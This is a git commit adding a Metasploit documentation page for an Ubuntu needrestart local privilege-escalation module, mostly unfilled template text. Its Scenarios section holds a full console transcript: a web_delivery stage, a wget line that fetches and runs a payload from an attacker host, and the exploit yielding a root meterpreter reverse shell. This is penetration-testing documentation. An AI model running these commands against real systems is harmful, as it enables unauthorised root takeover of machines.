ubuntu needrestart lpe
This commit is contained in:
h00die
@@ -0,0 +1,120 @@
|
||||
The following is the recommended format for module documentation. But feel free to add more content/sections to this.
|
||||
One of the general ideas behind these documents is to help someone troubleshoot the module if it were to stop
|
||||
functioning in 5+ years, so giving links or specific examples can be VERY helpful.
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
Instructions to get the vulnerable application. If applicable, include links to the vulnerable install
|
||||
files, as well as instructions on installing/configuring the environment if it is different than a
|
||||
standard install. Much of this will come from the PR, and can be copy/pasted.
|
||||
|
||||
## Verification Steps
|
||||
Example steps in this format (is also in the PR):
|
||||
|
||||
1. Install the application
|
||||
1. Start msfconsole
|
||||
1. Do: `use [module path]`
|
||||
1. Do: `run`
|
||||
1. You should get a shell.
|
||||
|
||||
## Options
|
||||
List each option and how to use it.
|
||||
|
||||
### Option Name
|
||||
|
||||
Talk about what it does, and how to use it appropriately. If the default value is likely to change, include the default value here.
|
||||
|
||||
## Scenarios
|
||||
Specific demo of using the module that might be useful in a real world scenario.
|
||||
|
||||
### Version and OS
|
||||
|
||||
```
|
||||
msf6 > use exploit/multi/script/web_delivery
|
||||
998
|
||||
run[*] Using configured payload python/meterpreter/reverse_tcp
|
||||
msf6 exploit(multi/script/web_delivery) > set target 7
|
||||
target => 7
|
||||
msf6 exploit(multi/script/web_delivery) > set payload linux/x64/meterpreter/reverse_tcp
|
||||
payload => linux/x64/meterpreter/reverse_tcp
|
||||
msf6 exploit(multi/script/web_delivery) > set lhost 1.1.1.1
|
||||
lhost => 1.1.1.1
|
||||
msf6 exploit(multi/script/web_delivery) > set lport 4998
|
||||
lport => 4998
|
||||
msf6 exploit(multi/script/web_delivery) > set srvport 8998
|
||||
srvport => 8998
|
||||
msf6 exploit(multi/script/web_delivery) > run
|
||||
[*] Exploit running as background job 0.
|
||||
[*] Exploit completed, but no session was created.
|
||||
msf6 exploit(multi/script/web_delivery) >
|
||||
[*] Started reverse TCP handler on 1.1.1.1:4998
|
||||
[*] Using URL: http://1.1.1.1:8998/dKtdkMS
|
||||
[*] Server started.
|
||||
[*] Run the following command on the target machine:
|
||||
wget -qO Ejq8lHli --no-check-certificate http://1.1.1.1:8998/dKtdkMS; chmod +x Ejq8lHli; ./Ejq8lHli& disown
|
||||
[*] 2.2.2.2 web_delivery - Delivering Payload (250 bytes)
|
||||
[*] Sending stage (3045380 bytes) to 2.2.2.2
|
||||
[*] Meterpreter session 1 opened (1.1.1.1:4998 -> 2.2.2.2:52004) at 2024-11-22 12:07:55 -0500
|
||||
|
||||
msf6 exploit(multi/script/web_delivery) > sessions -i 1
|
||||
[*] Starting interaction with 1...
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: h00die
|
||||
meterpreter > background
|
||||
[*] Backgrounding session 1...
|
||||
msf6 exploit(multi/script/web_delivery) > use exploit/linux/local/ubuntu_needrestart_lpe
|
||||
verbose true
|
||||
run
|
||||
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
|
||||
msf6 exploit(linux/local/ubuntu_needrestart_lpe) > set payload linux/x64/meterpreter/reverse_tcp
|
||||
payload => linux/x64/meterpreter/reverse_tcp
|
||||
msf6 exploit(linux/local/ubuntu_needrestart_lpe) > set lhost 1.1.1.1
|
||||
lhost => 1.1.1.1
|
||||
msf6 exploit(linux/local/ubuntu_needrestart_lpe) > set lport 4977
|
||||
lport => 4977
|
||||
msf6 exploit(linux/local/ubuntu_needrestart_lpe) > set session 1
|
||||
session => 1
|
||||
msf6 exploit(linux/local/ubuntu_needrestart_lpe) > set verbose true
|
||||
verbose => true
|
||||
msf6 exploit(linux/local/ubuntu_needrestart_lpe) > run
|
||||
|
||||
[*] Started reverse TCP handler on 1.1.1.1:4977
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
|
||||
[+] The target appears to be vulnerable. Vulnerable needrestart version 3.5-5ubuntu2.1 detected on Ubuntu 22.04
|
||||
[*] Writing '/tmp/.1K8Hy2tOtq' (250 bytes) ...
|
||||
[*] Uploading payload: /tmp/.1K8Hy2tOtq
|
||||
[*] Uploading c_stub: /tmp/.hnPKdLeU2s.c
|
||||
[*] Uploading py_script: /tmp/.FzzlJ
|
||||
[*] Uploading build and run script: /tmp/.h0IkpDa
|
||||
[*] Launching exploit, and waiting for needrestart to run...
|
||||
[*] Transmitting intermediate stager...(126 bytes)
|
||||
[*] Sending stage (3045380 bytes) to 2.2.2.2
|
||||
[*] chown: changing ownership of '/tmp/.1K8Hy2tOtq': Operation not permitted
|
||||
[*] Error processing line 1 of /usr/lib/python3/dist-packages/zope.interface-5.4.0-nspkg.pth:
|
||||
[*]
|
||||
[*] Traceback (most recent call last):
|
||||
[*] File "/usr/lib/python3.10/site.py", line 192, in addpackage
|
||||
[*] exec(line)
|
||||
[*] File "<string>", line 1, in <module>
|
||||
[*] ImportError: dynamic module does not define module export function (PyInit_importlib)
|
||||
[*]
|
||||
[*] Remainder of file ignored
|
||||
[*] #########################
|
||||
[*]
|
||||
[*] Dont mind the error message above
|
||||
[*]
|
||||
[*] Waiting for needrestart to run...
|
||||
[*] Payload owned by: root
|
||||
[+] Deleted /tmp/.1K8Hy2tOtq
|
||||
[+] Deleted /tmp/.hnPKdLeU2s.c
|
||||
[+] Deleted /tmp/.FzzlJ
|
||||
[+] Deleted /tmp/.h0IkpDa
|
||||
[+] Deleted /tmp/importlib
|
||||
[*] Meterpreter session 2 opened (1.1.1.1:4977 -> 2.2.2.2:57644) at 2024-11-22 12:08:28 -0500
|
||||
|
||||
meterpreter >
|
||||
meterpreter > getuid
|
||||
Server username: root
|
||||
```
|
||||
Reference in New Issue
Block a user